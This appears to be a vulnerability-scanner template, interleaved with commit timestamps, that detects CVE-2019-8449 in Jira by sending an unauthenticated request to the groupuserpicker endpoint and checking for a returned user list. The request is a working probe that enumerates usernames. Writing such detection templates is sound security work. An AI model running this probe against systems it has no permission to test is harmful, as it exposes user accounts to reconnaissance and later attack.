2021-01-02 04:59:06 +00:00
id : CVE-2019-8449
2020-06-30 10:36:15 +00:00
info :
name : JIRA Unauthenticated Sensitive Information Disclosure
2021-06-09 12:20:56 +00:00
author : harshbothra_
2020-06-30 10:36:15 +00:00
severity : medium
2021-03-30 12:10:17 +00:00
description : The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability.
2021-08-18 11:37:49 +00:00
reference :
2021-03-30 12:10:17 +00:00
- https://www.doyler.net/security-not-included/more-jira-enumeration
- https://jira.atlassian.com/browse/JRASERVER-69796
2021-02-05 19:44:41 +00:00
tags : cve,cve2019,atlassian,jira
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score : 5.30
cve-id : CVE-2019-8449
cwe-id : CWE-306
2020-06-30 10:36:15 +00:00
requests :
- method : GET
path :
- '{{BaseURL}}/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true'
2020-07-08 11:38:57 +00:00
matchers-condition : and
2020-06-30 10:36:15 +00:00
matchers :
- type : status
status :
- 200
- type : word
words :
2020-07-02 10:06:11 +00:00
- '{"users":{"users":'
2020-06-30 10:36:15 +00:00
part : body